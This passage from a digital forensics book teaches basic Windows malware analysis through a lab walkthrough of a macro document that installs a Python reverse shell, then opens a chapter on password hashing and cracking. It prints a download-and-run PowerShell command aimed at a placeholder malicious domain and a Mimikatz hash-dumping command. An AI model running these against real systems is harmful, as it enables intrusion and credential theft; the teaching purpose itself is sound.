using it to access any of my personal accounts and ran a network packet capture using Microsoft’s
NetMon, which is a packet capture tool similar to Wireshark. I noticed from the packet capture that
the machine was communicating with a Chinese domain which appeared unusual. I then conducted
a quick Google search on the domain and found that it was associated with a piece of malware.
The site I found listed additional IOCs, which enabled me to check running processes and find
the malicious executable running. I was then able to kill the process with Task Manager.
I was also able to review the registry with Regedit and delete the registry key that was created by
the malware to establish persistence. I was then able to notify the other users of the machine that
it had malware running on it that steals information such as account credentials. The machine was
then reimaged to ensure all of the malware was removed and the machine was back to a known
good state. Next, we will cover some of the basic tools that you can use to perform the same type of
simple analysis.
Basic Malware Analysis Tools
This section covers free tools that can be used for basic malware analysis to identify if a machine has
been infected with malware. You can use these tools to extract IOCs to share with the community or
to include in an Incident Response report in a professional setting. We will start with built-in tools
that you probably already know and discuss how to use them for basic malware analysis.
Task Manager is a built-in Windows tool that allows you to view running processes and how many
resources they are using. On Windows 10, right click the
task bar and select Task Manager from the menu to launch the Task Manager. On Windows 11, click
the Windows Start Menu icon and type Task Manager to search for the Task Manager app. You may
then need to click the drop-down arrow labeled More details.
You can use this tool to find suspicious processes running on the machine. More sophisticated
malware will attempt to blend in by using the names of common legitimate programs; however,
if you have a specific process name from an IOC, you can easily look to see if it is running. Each
process also has an arrow you can click to expand to show child processes.
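If you prefer to script this check, the sketch below shows one way to do it. It is a minimal example, assuming the third-party psutil package is installed (pip install psutil); the names in SUSPECT_NAMES are hypothetical placeholders for process-name IOCs you have already gathered, not real indicators.

```python
import psutil

# Hypothetical process-name IOCs taken from a threat report or blog post.
SUSPECT_NAMES = {"evil.exe", "updater32.exe"}

def find_suspect_processes():
    """Walk the process list and return any process whose name matches an IOC."""
    hits = []
    for proc in psutil.process_iter(["pid", "ppid", "name", "exe"]):
        name = (proc.info["name"] or "").lower()
        if name in SUSPECT_NAMES:
            hits.append(proc.info)
    return hits

if __name__ == "__main__":
    for hit in find_suspect_processes():
        print(f"PID {hit['pid']} (parent {hit['ppid']}): {hit['name']} -> {hit['exe']}")
```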
There are also Startup and Services tabs that allow you to review processes that are set to run
on startup and the list of installed services. You can review the Startup tab to help identify simple
persistence mechanisms of malware by finding applications that run on startup that are uncommon or
should not be included. This same process can be done on the Services tab to find suspicious services
installed on the machine. These tabs show you the same information that you would get by running
Startup Apps or services.msc independently from Task Manager.
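The same startup review can be scripted against the classic Run keys in the registry. The sketch below is a minimal example using only Python's standard-library winreg module (Windows only); the two paths shown are the common per-user and per-machine Run keys, not an exhaustive list of autostart locations.

```python
import winreg

# Common autorun locations; persistence can live in many other places too.
RUN_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
]

def list_run_entries():
    """Yield (key path, value name, command line) for each autorun entry."""
    for hive, path in RUN_KEYS:
        try:
            key = winreg.OpenKey(hive, path)
        except OSError:
            continue  # key missing or inaccessible
        with key:
            index = 0
            while True:
                try:
                    name, value, _type = winreg.EnumValue(key, index)
                except OSError:
                    break  # no more values under this key
                yield path, name, value
                index += 1

if __name__ == "__main__":
    for path, name, value in list_run_entries():
        print(f"{path}: {name} = {value}")
```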
You can pull up the details for each service listed in the Services tab or from services.msc. It will
list the Startup type, which is either Manual, Automatic, or Disabled. Services with the Automatic
startup type will start automatically when Windows boots. You can also find the path
to the executable that the service runs and what user or context it runs under. These details are
useful IOCs for malicious services installed by malware.
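Those same details can be collected programmatically. Here is a minimal sketch, again assuming the psutil package is installed; its win_service_iter() API is Windows-only.

```python
import psutil

def dump_services():
    """Print each installed service's name, start type, binary path, and account."""
    for svc in psutil.win_service_iter():
        try:
            info = svc.as_dict()
        except psutil.Error:
            continue  # some services deny access to non-admin callers
        print(f"{info['name']} ({info['display_name']})")
        print(f"  start type : {info['start_type']}")
        print(f"  binary path: {info['binpath']}")
        print(f"  runs as    : {info['username']}")

if __name__ == "__main__":
    dump_services()
```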
Process Explorer⁵⁹ (procexp.exe and procexp64.exe) from the Sysinternals Suite is another free tool
that provides a greater level of detail than the built-in Task Manager in Windows. It provides the
same functionality to kill processes while providing additional details in the main window. You can
submit hashes to VirusTotal through Process Explorer to help determine if a process is malicious.
⁵⁹https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer
Right-clicking a process and selecting Check VirusTotal will prompt you to accept submitting the
hash of the suspect process to VirusTotal. After selecting Yes on the prompt, the VirusTotal box
on the Image tab will contain a link to the VirusTotal results for the submitted hash. In this case, the
legitimate Microsoft Print Spooler executable spoolsv.exe was submitted, and 0 out of 73
antivirus vendors detected it as malicious.
Process Explorer also has a TCP/IP tab listing the addresses and ports the process is listening on
as well as its outbound communications. This helps a malware analyst determine whether the
process is listening on or communicating over any network ports, which can surface IOCs for
Command and Control (C2) or even data exfiltration.
The Strings tab is another great feature that lists the strings embedded in the binary, just like the
strings command in Linux. This is useful for finding IOCs and determining some of the capabilities
of the malware. You may be able to find IPs or domain names that are hardcoded into the
application, or strings that point to dangerous Windows API calls that hint at the executable being
malicious. The Sysinternals Suite can be downloaded here⁶⁰.
System Informer, formerly Process Hacker, is another great tool that performs similar functions to
⁶⁰https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Task Manager and Process Explorer. It provides the same level of process detail and groups the
processes in a parent/child layout like Process Explorer. Right-clicking a process in System
Informer allows you to terminate it, just like in Task Manager and Process Explorer. Right-clicking
and selecting Send to provides an option to send the process executable or DLL to VirusTotal,
similar to Process Explorer.
System Informer includes a Modules tab when right-clicking a process and selecting Properties.
This Modules tab lists all of the modules loaded and in use by the process, which is helpful for
finding additional IOCs or identifying malicious DLL files used by a suspicious process.
System Informer provides Services and Network tabs that offer similar functionality to the features
covered under Task Manager and Process Explorer. A malware analyst can use the Services tab to
search for suspicious services and review the details of the service. The Network tab can be used
to map running processes to active network connections and listening ports. System Informer is
available for download at https://github.com/winsiderss/systeminformer.
Process Monitor⁶¹, or Procmon, is another tool included in the Sysinternals Suite that is useful for
monitoring processes. Procmon goes beyond the process information provided by Task Manager,
Process Explorer, or System Informer: it details every action taken by a process, allowing in-depth
analysis of suspicious or malicious processes. Procmon will quickly overload an analyst with data
unless filters are applied to cut out the noise. It enables an analyst to find IOCs and understand
what actions the malware has taken on the system.
⁶¹https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
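Procmon can also be driven from the command line, which is convenient for capturing a run of a
suspect sample and handing the result to ProcDOT (covered next). A rough sketch using documented
Sysinternals flags, with arbitrary file names:

rem Start capturing events to a backing file without prompts
procmon.exe /AcceptEula /Quiet /Minimized /BackingFile capture.pml
rem ...reproduce the suspicious behavior, then stop the capture...
procmon.exe /Terminate
rem Convert the saved log to CSV for import into ProcDOT
procmon.exe /OpenLog capture.pml /SaveAs capture.csv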
ProcDOT is useful for filtering and displaying the results from Procmon. ProcDOT allows an analyst
to ingest the logs generated from a Procmon capture saved in a CSV file. The analyst can then select
the desired process from the imported CSV file and ProcDOT will generate an interactive graph.
This effectively filters out the noise of unrelated processes, giving the analyst an easy-to-follow
graph that displays all actions conducted by the malware, including those of child processes
spawned by the original process. ProcDOT can also ingest packet captures to correlate network
traffic with the Procmon events. ProcDOT can be downloaded here⁶².
The netstat⁶³ utility included in Windows is another useful tool. You can use it to list all listening
ports and established connections with the command netstat -ano. The output includes the process
ID (PID) of the process using each listed port, helping you correlate a suspicious connection to a
process.
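For example, you can narrow the output with the built-in findstr command (the port here is just an
illustration):

rem List all connections and listening ports with owning PIDs
netstat -ano
rem Show established connections only
netstat -ano | findstr ESTABLISHED
rem Check whether anything is using a specific port of interest
netstat -ano | findstr :8443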
⁶²https://www.procdot.com/downloadprocdotbinaries.htm
⁶³https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat
The tasklist⁶⁴ command can be used to list running processes and their associated process IDs from
the command line. This helps you enumerate suspicious processes without needing a Graphical
User Interface (GUI). It is helpful when used in conjunction with netstat to look up the process ID
found with a suspicious network connection. The below screenshot shows that PID 4, listening on
port 445 (SMB) on all interfaces (0.0.0.0), is the System process. In this case it is a legitimate process
and listening port combination. The System process always runs as PID 4, so a PID other than 4
would be unusual and a potential IOC.
⁶⁴https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist
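As a quick illustration, the following commands resolve a PID of interest and list the services hosted
by each process:

rem Show only the process with PID 4
tasklist /FI "PID eq 4"
rem List processes along with the services they host
tasklist /SVC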
Another way to do the same analysis is to use the TCPView⁶⁵ tool from the Sysinternals Suite.
TCPView provides the same information as netstat -ano and tasklist /SVC in a convenient,
easy-to-read GUI. This allows you to quickly identify suspicious listening ports or connections and
correlate them to the corresponding process. The remote address listed in TCPView and netstat is
another useful IOC to include in your analysis.
⁶⁵https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview
Wireshark is a valuable tool to conduct more in-depth packet analysis. Wireshark enables a malware
analyst to view all network traffic sent and received on the suspected machine. An analyst can filter
the packets by IP, port, protocol, or many other options. Filtering by DNS protocol enables an analyst
to find DNS queries to malicious sites used for Command and Control (C2) of malware. The domains
found in the DNS queries are useful IOCs to determine if the machine is compromised.
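A few illustrative display filters, where the domain and IP are placeholders:

dns
dns.qry.name contains "maliciousdomain"
ip.addr == 192.168.163.128 && tcp.port == 8443

The first shows only DNS traffic, the second isolates queries for a suspicious domain, and the third
isolates traffic to a specific host and port.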
Wireshark provides capabilities to conduct more advanced analysis of malware communication. It
allows an analyst to identify C2 traffic hidden in protocols such as DNS. It also enables an analyst to
extract data such as second stage binaries or infected text documents downloaded by the malware.
Using a proxy in combination with Wireshark enables an analyst to export the certificate and keys
used to encrypt Transport Layer Security (TLS) encrypted traffic to recover the plaintext data sent
between malware and attacker-controlled servers.
The malware analysis walkthrough in this chapter will focus on using Wireshark to perform basic
analysis tasks. This includes reviewing DNS queries to identify suspicious domain lookups and
plaintext commands/passwords sent during malware communication. More advanced usage of
Wireshark is out of scope of basic malware analysis and is saved for future writings on intermediate
and advanced malware analysis. Wireshark can be downloaded here⁶⁶. Microsoft’s NetMon is an
alternative to Wireshark, but is only available for download from archive⁶⁷ and is no longer being
developed.
Regedit is another useful tool built into Windows. Regedit gives the ability to view and edit the
Windows registry. It can be used in basic malware analysis to search for persistence mechanisms
such as entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Applications listed in
the run keys will auto-start when a user logs in to the machine, which is sometimes used by malware
to establish persistence.
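The same run keys can be checked from the command line with the built-in reg tool, for example:

rem Enumerate the machine-wide and per-user run keys
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run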
⁶⁶https://www.wireshark.org/
⁶⁷https://www.microsoft.com/en-us/download/4865
Regshot is useful for determining what changes an application makes to the Windows registry when
it is executed. Regshot allows an analyst to take a snapshot of the Windows registry before and after
executing a suspicious application and generates a comparison of the two snapshots. This is useful
when analyzing a suspicious application in a controlled lab setting. Regshot can be downloaded
here⁶⁸. However, Regshot is no longer being actively maintained. NirSoft provides an alternative to
Regshot that is capable of handling registry comparisons. NirSoft’s RegistryChangesView can be
found here⁶⁹. The malware analysis portion of this chapter will still use Regshot.
⁶⁸https://github.com/Seabreg/Regshot
⁶⁹https://www.nirsoft.net/utils/registry_changes_view.html
Certutil is another tool built into Windows that is useful for malware analysis. An analyst can use
certutil to generate a hash of a file to compare against known malicious file hashes. This can indicate
whether a file is malicious without having to execute it to investigate what it does. Once a suspicious
file is determined to be malicious through analysis, the hashes generated by certutil can be used as
IOCs.
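As a concrete illustration of the syntax shown in the screenshot (the file path is just an example):

rem Hash a file with MD5, SHA1, and SHA256
certutil -hashfile C:\Windows\System32\cmd.exe MD5
certutil -hashfile C:\Windows\System32\cmd.exe SHA1
certutil -hashfile C:\Windows\System32\cmd.exe SHA256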
Certutil⁷⁰ is used in the above screenshot to generate the SHA1, MD5, and SHA256 hashes of cmd.exe.
A malware analyst can compare these hashes to the hashes of the known legitimate versions of
cmd.exe installed with Windows. The analyst can also submit these hashes to VirusTotal to see if it
is a known malicious file.
An analyst can also use automated tools for analysis. Multiple tools mentioned already have features
to upload files or hashes to VirusTotal. A suspicious file can be uploaded to VirusTotal⁷¹, an online
system that executes the file in a sandbox to attempt to determine whether it is malicious. It will
then provide file hashes and IOCs an analyst can use to identify the file. VirusTotal also shares
uploaded files with antivirus vendors to use for building detection signatures.
⁷⁰https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
⁷¹https://www.virustotal.com/gui/home/upload
Antiscan.me⁷² is another option an analyst can use to analyze a suspect file. Antiscan.me only
checks uploaded files against 26 different antivirus engines, and it does not share the files with the
antivirus vendors. This makes it a good option if you are analyzing a file that you do not want to
be shared with other organizations.
⁷²https://antiscan.me/
Basic Malware Analysis Walkthrough
It is time to do a walkthrough of a sample malware analysis now that you are familiar with some of
the tools used for malware analysis and their capabilities. The walkthrough will teach how to use
some of the tools mentioned in this chapter. It will not use any tools not previously mentioned.
In this scenario a user has reported to you that their machine has been running slow and acting
“weird”. You have already conducted initial investigations by asking the user questions including:
“When did the issues start?”, “Did you download or install any new applications?” and “Did you
click any links or open any documents from untrusted sources?” The user states that they did not
install any application recently but did review a Microsoft Word document sent from a customer.
We start our analysis by opening TCPView from the Sysinternals Suite to determine if we can
quickly find any unusual processes communicating with remote sites. In this simple scenario, we
find that there is currently only one process, python.exe, communicating with a remote system. We
flag this as suspicious since Python is not typically used in this manner on our fictitious network.
We then make a note of the port and IP as potential IOCs.
We can verify this using the other tools covered earlier as well. Netstat -ano lists an established
connection between our test machine and the simulated attacker machine, with local IP/port
192.168.163.131:63590 and remote IP/port 192.168.163.128:8443, from the process with PID 6440.
Tasklist /SVC lists that python.exe is running as PID 6440.
Process Explorer can also be used to verify the findings. Right-clicking on python.exe, selecting
Properties, and then selecting the TCP/IP tab lists the connection to 192.168.163.128:8443. System
Informer provides another easy means to find the unusual connection and correlate it to the
python.exe process by selecting the Network tab.
We have verified that there is unusual network traffic on the potentially compromised machine and
need to dig deeper into the traffic. We then open up Wireshark to review a packet capture of the
incident. We use the IP and port combination (ip.addr == 192.168.163.128 and tcp.port == 8443)
to filter the traffic down to the currently interesting packets. The traffic is not encrypted which will
allow us to extract plaintext communications.
We then right-click on one of the packets and select Follow TCP Stream to pull up the conversation
in a readable format. This confirms that the process is malicious and is used to create a reverse shell
to the attacker. We are able to identify commands sent by the attacker and the responses from the
infected machine.
The attacker ran a series of commands to enumerate identifying information about the machine and
what privileges the user account has. The attacker then attempted to establish persistence by creating
a service named NotBackDoor to auto-start the malware containing the reverse shell. That action
failed, leading the attacker to attempt persistence instead by creating a run key in the registry for
the current user, which succeeded.
At this point we have verified that there is malware present on the system and that it is actively
being exploited by a remote attacker. We immediately take action to isolate the machine to cut off
access from the attacker and protect the rest of the network. In this scenario we simply block
the IP and port on the perimeter firewall and remove the infected machine from the network before
continuing our analysis.
We then take steps to confirm the persistence measures taken by the attacker. We review the services
in services.msc to verify that the NotBackDoor service was not successfully created, then take a
look to ensure no other unusual services exist. The NotBackDoor service name and the binPath option
of C:\Python27\python.exe C:\Windows\Tasks\bdw.py are still noted as IOCs, since the attacker did
attempt to create the service and it could be present on other infected machines where the attempt succeeded.
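A quick command-line check of the same thing might look like this (the expected outcome here is
an error stating the service does not exist):

rem Confirm the NotBackDoor service was never created
sc query NotBackDoor
rem If it had existed, this would dump its binary path and start type
sc qc NotBackDoor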
Regedit is then used to verify the run key created, after verifying that no malicious services exist.
We do find a NotBackDoor key that points to C:\Python27\python.exe C:\Windows\Tasks\bdw.py
and make note of this as an IOC. We also note that C:\Windows\Tasks is commonly used as a location
to drop malware because low-privilege users can write to it, and it is commonly excluded from
protections such as application whitelisting since it is located under C:\Windows.
The next step for this scenario is to navigate to the C:\Windows\Tasks folder to investigate the
bdw.py file mentioned in the previous steps. The investigation finds that this is just a simple Python
script to establish a reverse shell from the infected computer to the attacker’s machine. We are
able to determine that it contains the port number 8443, but it points to the domain name
maliciousdomain.cn instead of an IP address.
We add this domain to the list of IOCs. We could also have identified the traffic associated with this
domain if we had started this investigation by looking for suspicious DNS calls. The .cn top-level
domain indicates this is a Chinese domain, and in a scenario where traffic to China is abnormal,
this is a potential red flag.
We know that bdw.py is malicious and provided a remote attacker access to the infected machine,
but we do not yet know how it got there. We see that the document the user stated they received
from a new customer ends with the extension .docm. This informs us that the document contains
macros, which could be the initial infection vector (IIV). Analysis of this file needs to be done in an
isolated lab to prevent any reinfection.
The document in this scenario contains only one line of text stating that it is a generic document
for a malware analysis walkthrough. In a real-world scenario we could search for unique strings in
the document to use as IOCs to help others determine whether they have received the same
document. The next step is to check the document for macros.
Click View in the ribbon menu at the top of the document. Then select the Macros button and
click the Edit button in the window that pops up. We find that this document does contain a
simple macro that uses PowerShell to download bdw.py from maliciousdomain.cn. The macro then
executes bdw.py to initiate the initial reverse shell connection. The macro contains the AutoOpen and
Document_Open subroutines to run the downloader when the document is opened. We have now
verified that Doc1.docm is a downloader used to infect the system with a Python-based reverse shell.
We add Doc1.docm to our list of IOCs.
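The chapter does not reproduce the macro verbatim, but as a hedged sketch, the download-and-execute
behavior described above boils down to something like the following two commands (the exact
cmdlet and URL path are assumptions; the file and interpreter paths come from the IOCs in this
scenario):

rem Hypothetical downloader: fetch the second stage over plain HTTP
powershell -Command "Invoke-WebRequest -Uri http://maliciousdomain.cn/bdw.py -OutFile C:\Windows\Tasks\bdw.py"
rem Execute the reverse shell with the local Python interpreter
C:\Python27\python.exe C:\Windows\Tasks\bdw.py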
We could have started our analysis with the Doc1.docm document that was mentioned by the user.
This would have given us the information to track down the reverse shell that we found by analyzing
the network traffic and processes earlier. Running Wireshark while executing the macro helps us find
the DNS calls to maliciousdomain.cn. We can also extract the bdw.py script from the HTTP stream
since it was downloaded unencrypted via HTTP. This can be useful in instances where more advanced
malware downloads another stager and then deletes it from the system after running its
payload.
We can also use the built-in certutil.exe tool to generate hashes of the malware files to use as
IOCs. Run certutil -hashfile Doc1.docm SHA256 to generate a SHA256 hash of the document. You
can also generate an MD5 hash and generate the hashes for bdw.py. These are useful IOCs for
signature-based systems to detect the presence of the malware.
We can use Procmon and ProcDOT to verify that the malicious files did not spawn any additional
processes that need to be investigated. The ProcDOT graph shows us that the python.exe process
communicated over TCP to IP 192.168.163.128 and spawned a cmd.exe process. We can see the
commands that were run in the cmd.exe process in the graph and verify that no additional files
or processes were created.
We can verify whether any other registry settings are changed by executing the Word document
macro on our test machine. We use Regshot to take a snapshot before and after opening the
document and then open a comparison of the snapshots to review the changes. Start Regshot, click
1st shot, and then select Shot.
We then open the malicious Word document. We execute the macro, allowing it to download the
bdw.py reverse shell from our attacker webserver and add our persistence registry key under
HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Then we click 2nd shot in Regshot and
select Shot. This takes the second snapshot and allows us to click the Compare button to compare
the snapshots.
This produces a .txt document listing all of the registry changes that occurred between the
snapshots. It contains a lot of noise and can be tedious to sort through, but we can verify that the
persistence mechanism was added. We can also find evidence that the user clicked the Enable Content
button allowing the macro to run; this is found by searching for TrustRecords to find an entry that
lists the malicious document added to the TrustRecords key.
We can include automated analysis by uploading the document to VirusTotal to determine whether
it is detected as malicious by any of the antivirus vendors. VirusTotal shows 30 out of 62 vendors
detecting the document as malicious, with most of the detections flagging it as a downloader. This
matches what we determined from our own analysis.
Analysis Wrap-Up
We have now completed analyzing the system to verify that it is infected with malware. We
determined what the malware does and we have extracted IOCs to implement in our defensive
tools to detect future infection attempts. The machine will need to be reimaged before returning it
to the user to ensure all malware has been eradicated. It is important to take a forensic image before
reimaging the system if evidence preservation is needed for legal cases or future investigations. To
recap our IOCs:
• Downloader macro in the document titled Doc1.docm
• Unique string “This is a generic document for a malware analysis walkthrough” in Doc1.docm
• Second stage Python reverse shell named bdw.py stored in C:\Windows\Tasks
• Service named NotBackDoor to auto-start bdw.py
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NotBackDoor registry key to
autorun bdw.py
• SHA256 hash of Doc1.docm - 6fa2281fb38be1ccf006ade3bf210772821159193e38c940af4cf54fa5aaae78
• MD5 hash of Doc1.docm - b85e666497ea8e8a44b87bda924c254e
• SHA256 hash of bdw.py - f24721812d8ad3b72bd24792875a527740e0261c67c03fe3481be642f8a4f980
• MD5 hash of bdw.py - 34ca38da117d1bb4384141e44f5502de
• bdw.py downloaded from maliciousdomain.cn
• bdw.py reverse shell to IP 192.168.163.128 (maliciousdomain.cn)
• bdw.py reverse shell on port 8443
Conclusion
This was a simple example of how to conduct basic malware analysis. The tools and techniques
discussed here can be used in a real-world scenario to determine if a machine is infected
with malware and extract some IOCs. The malicious files used for this scenario and a copy of the
walkthrough can be found on my GitHub⁷³. You will need a system with netcat to receive the reverse
shell, as well as fakedns⁷⁴ to simulate a DNS server and direct the maliciousdomain.cn calls to your
attacker machine.
More advanced malware will require additional tools and techniques. The techniques used to reverse
engineer malware, including decompiling, disassembling, and debugging, are covered in courses such
as SANS FOR610 Reverse Engineering Malware⁷⁵. The FOR610 course is a good step up to the
next level if you enjoyed this basic malware analysis. The course also teaches some techniques
for deobfuscating code, whereas this basic analysis only covered unobfuscated code.
Additional advanced topics to look into include techniques to recover encryption keys. Those
techniques are useful for decrypting the source code of encrypted malware or for recovering keys to
decrypt files that have been encrypted by ransomware. Assembly language programming familiarity
is needed for debugging and reverse engineering of malware. Basic knowledge of JavaScript is also
useful for analyzing web-based malware.
You can also increase your skills by taking a malware development course from Sektor7⁷⁶. Learning
to develop malware will help you better understand how to detect malware and will teach you
additional techniques used by modern malware. SANS also offers the advanced FOR710 course for
Reverse-Engineering Malware: Advanced Code Analysis⁷⁷.
If you enjoyed this walkthrough and would like to check out more, you can check out my GitHub⁷⁸
for a walkthrough on performing white box code analysis of a vulnerable web application and
coding a full chain exploit. I have solutions for various vulnerable web applications and binary
exploitation challenges and will be adding a couple of binary exploitation and reverse engineering
walkthroughs in the future. I can also add in intermediate malware analysis walkthroughs if there
is enough interest.
⁷³https://github.com/ApexPredator-InfoSec/Basic-Malware-Analysis
⁷⁴https://github.com/SocialExploits/fakedns/blob/main/fakedns.py
⁷⁵https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/
⁷⁶https://institute.sektor7.net/red-team-operator-malware-development-essentials
⁷⁷https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/
⁷⁸https://github.com/ApexPredator-InfoSec
Chapter 3 - Password Cracking for
Beginners
By John Haynes⁷⁹ | GitHub⁸⁰ | Discord⁸¹
Disclaimer & Overview
This chapter is a beginner’s guide on how to crack passwords. While on the surface this may seem to
be something reserved for cybercriminals, there are legitimate reasons for a law-abiding individual
to understand this process. Firstly, those who work in penetration testing or a red team environment
will need to know how to do this task. Secondly, law enforcement may need to access data that is
password protected with the legal authority of a search warrant. Third, important data may need
to be recovered from a device after the owner is deceased for the estate or heirs. There may also
be other ways to legally access password-protected data such as forgotten passwords or security
concerns in a corporate environment. Finally, it is important for someone who wishes to keep their
data secure to understand this process to know why a strong password is important and how to test
the security of their passwords without compromising those passwords.
That being said, I do not condone, encourage, or support those who would use this information
for malicious or illegal means. This chapter will start with the fundamentals of hashing and end
with showing how a strong password makes a substantial difference when attempting to crack
complex passwords. I will also touch on more advanced concepts for custom wordlist generation
and optimization.
⁷⁹https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg
⁸⁰https://github.com/FullTang
⁸¹http://discordapp.com/users/167135713006059520
In digital forensics, the first challenge is to get the data in a state so that it can be analyzed. For those
that need to legally access the data, there should be something in here for you. For those that wish
to learn how to better secure their data, there should be something in here for you as well. Let’s get
started!
Password Hashes
At the fundamental level, a password is like a key that fits into and unlocks a particular lock. Only
you have the key, but anyone can come up and inspect the lock. With a mechanical lock, nobody
can see the internal functions of the lock without specialized tools like lock picks. If someone were
proficient at using lockpicks, they could theoretically determine the depth of each pin while picking
the lock and make a key that would unlock it.
The same sort of concept is true for passwords. Each password should have a unique algorithmic
hash. To obtain a hash, a complex mathematical algorithm is run against a string of data, and the
output is a practically unique character string. For some weaker hash algorithms, there have been
hash collisions where two different sets of data have resulted in the same output hash. However,
when considering human-generated passwords, it is normally not necessary to worry about hash
collisions. It is sufficient to say that if you have the hash of a password, you have the password in an
encrypted state. The password hash is how the password is stored on any modern operating system
like Windows, macOS, or Linux or for encrypted containers like BitLocker or encrypted 7-Zip files.
With the right tools, that is the only part of the password that will be available for an examiner to
inspect, just like the mechanical part of a lock is the only thing to inspect on a locked door if someone
were to try and pick the lock. There are methods to prevent the extraction of a password hash, but
it is reasonable to attempt to find a method to extract a hash from a system if the individual has
physical access to the electronic device, encrypted file, or a forensic image (.E01, dd, or similar) of
an encrypted volume or file.
Therefore, if the password hash can be extracted, it can be attacked to attempt to crack the password.
Hashing algorithms are mathematically a one-way operation. If someone has a password hash, there
is no normal mathematical operation that can be performed to reverse engineer the original plaintext
password. Additionally, some hashing algorithms are more difficult to crack than others because
computation speed is sacrificed for security. However, the user can guess a potential password,
hash it, and then compare the resulting hash against the known hash. If it is a match, then the
password is cracked. This would be a very slow method to do manually, but there is software like
Hashcat that can be used to automate this process to perform thousands of attempts per second. To
make the guessing more difficult, the system can implement what is known as “salt” into the hash
to obfuscate the hash and make it more difficult to crack.
A discussion of password hashes would not be complete without mentioning salted passwords. The
salt for a password is additional data that is added to the password before the hash algorithm is
applied to complicate the guessing of the password. Therefore, the salt would have to be known and
applied to each potential guess; otherwise the hash would be incorrect even if the correct password
was guessed. The salt can be generated in several different ways and can be static or dynamic
depending on developer choice. Unfortunately, Windows does not salt the NTLM password hashes
that it generates, so they are vulnerable to attack.
As was just mentioned, Windows stores password hashes in NTLM format. This is unfortunately a
very weak format, as it is equivalent to the MD4 hashing algorithm. The VTech company was
compromised in 2015 by a SQL injection attack, and when the password hashes were analyzed they
were determined to be hashed with MD5. MD5 is considered weak by modern standards, and some
do not consider it adequate protection at all. Windows uses an even weaker algorithm for its
passwords, and those hashes are not even salted to compensate for the weakness! Windows has
upgraded to NTLMv1 and NTLMv2 for some uses, but those are still weak by most standards. Even
more concerning, these NTLM hashes of user passwords are transmitted over the network for
authentication between computers (Patton, 2022). This is one of the most common passwords that
users will use, and it can be extracted by several methods, including packet sniffing. It is also nearly
guaranteed not to be generated by a password manager, as the user has to physically type the
password on the keyboard.
Useful Software Tools
There is no reason to reinvent the wheel as in most situations someone else has already created a tool
that will perform the task needed. The same is true for using software to assist in cracking passwords.
The general workflow for cracking a password is hash extraction, hash identification, attacking the
hash with general methods, and attacking the hash with custom methods. Tools that can assist in
these phases are Mimikatz⁸², Hashcat⁸³, John the Ripper⁸⁴, Passware⁸⁵, Gov Crack⁸⁶, custom scripts
often shared on GitHub, and many more. Some tools like Passware are paid tools, and while there
is nothing wrong with a paid tool, this chapter will focus on using the free tool called Hashcat. Gov
Crack has a graphical user interface (GUI) while Hashcat and John the Ripper use command-line
interfaces (CLI). Normally GUI interfaces allow for ease of access but tend to lack the flexibility of
CLI tools. Nearly all of the custom scripts for hash extraction posted on GitHub are CLI-based
tools. If the reader is unfamiliar with the command line, that should not be a limiting factor for at
least understanding the methods discussed in this chapter, and there will be step-by-step instructions
on how to crack a password hash in Hashcat. The focus on a particular set of tools over others is
due to personal experience with certain tools; no bias towards any particular tool is intended, as
many tools can do the same thing and overlap with each other in certain functions.
⁸²https://github.com/gentilkiwi/mimikatz
⁸³https://hashcat.net/hashcat/
⁸⁴https://github.com/openwall/john
⁸⁵https://www.passware.com/
⁸⁶https://www.govcrack.com/
Hash Extraction Techniques
One common method to extract an NTLM hash is to use Mimikatz, but it is widely recognized as
malware by most anti-virus software. If the individual has access to a forensic image (an .E01
or similar) of the hard drive of the computer, then Mimikatz can be used against the SAM and
SYSTEM registry files found in C:\Windows\System32\config, assuming BitLocker or another form
of encryption is not present. Even with live access to a machine, administrator rights and a forensic
tool such as FTK Imager⁸⁷, preferably preloaded on a USB drive, will be required to copy the registry
files, as a simple copy/paste or drag-and-drop method will not work. This is just one way to obtain
an NTLM hash, as it can also be obtained by observing network traffic. In general, this is a great
place to start when trying to crack passwords and try out different methods, as the NTLM hash uses
a weak hashing algorithm.
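Assuming the two hives have been exported, a typical offline Mimikatz invocation, run from the
Mimikatz console, looks something like this (the file paths are examples):

lsadump::sam /system:C:\case\SYSTEM /sam:C:\case\SAM

This parses the exported SYSTEM hive for the boot key and dumps the NTLM hashes stored in the
SAM hive.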
If the examiner is looking at an APFS encrypted volume from a MacBook, it is important to realize
that the password for the encrypted volume is the same as the password used to log into the
system. However, this hash uses a strong encryption method and will take much longer to crack
as compared to an NTLM hash. To extract the hash, there are tools available like the one from user
Banaanhangwagen⁸⁸ on GitHub. This will require using Linux to run the tool and extract the hash
from a raw or .dd forensic image.
Other encryption methods include BitLocker, zipped or compressed files, password-protected Word
documents, and many more. Generally speaking, some smart person somewhere has found out how
to extract the hash and has shared that information for that particular situation. The examiner
needs to search for hash extraction of a particular make, model, file system, software version, or a
combination of those and similar attributes. John the Ripper⁸⁹ is a great place to start when looking
for how to extract a hash. Also as a general rule, the hash is likely to be stored in plain text somewhere
in the hex (the raw data) on an electronic device. If the examiner is willing to poke around and search
the hex, they may be able to find the password hash assuming the correct decoding method is used.
This is not a hard-and-fast rule by any means, as there are complex methods of preventing external access
to protected memory areas. For example, at the time of writing this, I know of no known method to
extract a hash from a Chromebook even though it is possible to log into a Chromebook without it
being connected to the internet, implying that a hash of the user’s password must be stored locally
on the device.
⁸⁷https://www.exterro.com/ftk-imager
⁸⁸https://github.com/Banaanhangwagen/apfs2hashcat
